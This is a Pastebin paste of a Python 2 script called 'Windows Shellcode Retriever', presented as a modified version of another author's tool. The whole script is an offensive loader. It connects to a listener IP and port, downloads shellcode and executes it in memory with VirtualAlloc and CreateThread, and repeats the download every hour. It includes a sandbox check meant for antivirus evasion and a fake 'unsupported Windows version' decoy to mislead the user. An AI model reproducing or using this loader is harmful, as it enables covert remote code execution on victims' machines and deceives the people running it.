Advertisement
opexxx

Shellcode Retriever

Sep 1st, 2015
220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # Windows Shellcode Retriever
  4. # By: HR
  5. #
  6. # It's just a slightly modified version of Joshua Pitts' Shellcode Retriever Script...
  7. # Use Shellcode Sender on the other end to serve up your payloads for execution
  8. #
  9.  
  10. import ctypes, os, signal, socket, sys, time
  11.  
  12. TARGET='192.168.1.4' # Shellcode Sender Listener IP
  13. PORT=31337           # Shellcode Sender Listener Port
  14. BEACON=True          # Repeat Shellcode Retrival
  15. BEACON_DELAY=3600    # 1 hour delay between retrieval attempts
  16.  
  17.  
  18. def system_info():
  19.   """
  20.     Check System Info and Returns Info in Dictionary Array
  21.       {
  22.         'Available Physical Memory': '644 MB',
  23.         'Product ID': '00426-OEM-8992662-00006',
  24.         'OS Name': 'Microsoft Windows 7 Ultimate',
  25.         'BIOS Version': 'Phoenix Technologies LTD 6.00, 7/2/2012',
  26.         'System Model': 'VMware Virtual Platform',
  27.         'System type': 'X86-based PC',
  28.         'Total Physical Memory': '1,023 MB',
  29.         'Logon Server': '\\\\WIN-6CQ3JVLCHM4',
  30.         'Domain': 'WORKGROUP',
  31.         'Windows Directory': 'C:\\Windows',
  32.         'OS Version': '6.1.7601 Service Pack 1 Build 7601',
  33.         'System Manufacturer': 'VMware, Inc.',
  34.         'Host Name': 'WIN-6CQ3JVLCHM4'
  35.       }
  36.  
  37.     Example:
  38.        >>> info = SysInfo()
  39.        >>> info['OS Version']
  40.        '6.1.7601 Service Pack 1 Build 7601'
  41.  
  42.     Borrowed from our sacred stackoverflow:
  43.        http://stackoverflow.com/questions/467602/how-can-i-read-system-information-in-python-on-windows
  44.  """
  45.   values  = {}
  46.   cache   = os.popen2("SYSTEMINFO")
  47.   source  = cache[1].read()
  48.   sysOpts = ["Host Name", "OS Name", "OS Version", "Product ID", "System Manufacturer", "System Model", "System type", "BIOS Version", "Domain", "Windows Directory", "Total Physical Memory", "Available Physical Memory", "Logon Server"]
  49.   for opt in sysOpts:
  50.     values[opt] = [item.strip() for item in re.findall("%s:\w*(.*?)\n" % (opt), source, re.IGNORECASE)][0]
  51.   return values
  52.  
  53.  
  54. def decoy_message():
  55.   """ Decoy Message to Present to User on Epic Failure """
  56.   info = system_info()
  57.   print "\n[x] Unsupported Windows Version!"
  58.   print "   [*] Platform: %s" % sys.platform
  59.   print "   [x] Build Version: %s" % info['OS Version']
  60.   print "\n[*] Keep Checking Developer Site for updates...\n\n"
  61.   sys.exit(0)
  62.  
  63.  
  64. def sandbox_check():
  65.   """
  66.     Quick sandbox check for additional av evasion.
  67.     And a message to throw the user off.
  68.  """
  69.   ##################################################################################
  70.   # Add some mathematical stuff or some time consuming activities for added delays #
  71.   ##################################################################################
  72.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  73.   sandbox = True
  74.   try:
  75.     s.connect(('127.0.0.1', 445))
  76.     s.close()
  77.     sandbox = False
  78.   except:
  79.     pass
  80.   if sandbox == True:
  81.     try:
  82.       s.connect(('127.0.0.1', 135))
  83.       s.close()
  84.     except:
  85.       # Mission Abort!
  86.       decoy_message()
  87.  
  88.  
  89. def run_shellcode(shellcode):
  90.   """
  91.     ctypes VritualAlloc, MoveMem, and CreateThread
  92.     From http://www.debasish.in/2012_04_01_archive.html
  93.  """
  94.   # Get pointer to our allocated memory space
  95.   pointer = ctypes.windll.kernel32.VirtualAlloc(
  96.     ctypes.c_int(0),
  97.     ctypes.c_int(len(shellcode)),
  98.     ctypes.c_int(0x3000),
  99.     ctypes.c_int(0x40)
  100.   )
  101.  
  102.   # Move Shellcode into memory
  103.   buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  104.   ctypes.windll.kernel32.RtlMoveMemory(
  105.     ctypes.c_int(pointer),
  106.     buf,
  107.     ctypes.c_int(len(shellcode))
  108.   )
  109.  
  110.   # Create new thread and run our shellcode in it
  111.   thread_handle = ctypes.windll.kernel32.CreateThread(
  112.     ctypes.c_int(0),
  113.     ctypes.c_int(0),
  114.     ctypes.c_int(pointer),
  115.     ctypes.c_int(0),
  116.     ctypes.c_int(0),
  117.     ctypes.pointer(ctypes.c_int(0))
  118.   )
  119.  
  120.   # Wait for our thread to finish or timeout
  121.   ctypes.windll.kernel32.WaitForSingleObject(
  122.     ctypes.c_int(thread_handle),
  123.     ctypes.c_int(-1)
  124.   )
  125.   return
  126.  
  127.  
  128.  
  129. def fetch_shellcode(target, port):
  130.   """
  131.     Raw TCP Socket Request to Target:Port to grab our remote shellcode
  132.     The received Shellcode is then passed off to be run
  133.  """
  134.   # Open TCP Socket Connection to target:port
  135.   print '[*] Downloading Shellcode...'
  136.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  137.   s.connect((target,port))
  138.  
  139.   # Receive shellcode
  140.   data = s.recv(1024)
  141.   shellcode = data
  142.   while data != '':
  143.     data = s.recv(1024)
  144.     if data == '':
  145.       break
  146.     else:
  147.       shellcode += data
  148.  
  149.   # Convert to Bytearray for usability sake
  150.   shellcode = bytearray(shellcode)
  151.  
  152.   # Pass to be run in memory...
  153.   print '[*] Executing Shellcode in Memory....'
  154.   run_shellcode(shellcode)
  155.  
  156.  
  157.  
  158. def main():
  159.   # Does making connetions raise alerts?
  160.   sandbox_check()
  161.    
  162.   if TARGET == '':
  163.     decoy_message() # If you cant read and edit source, you fail
  164. #    TARGET = raw_input("Enter Shellcode Listner IP: ")
  165. #    PORT = raw_input("Enter Shellcode Listner Port: ")
  166.   try:
  167.     fetch_shellcode(TARGET, int(PORT))
  168.     while BEACON is True:
  169. #      print '[*] Sleeping for %d seconds....' % BEACON_DELAY
  170.       time.sleep(BEACON_DELAY)
  171.       fetch_shellcode(TARGET, int(PORT))
  172.            
  173.   except Exception, e:
  174. #    print str(e)
  175.     pass
  176.    
  177. if __name__ == "__main__":
  178.   main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement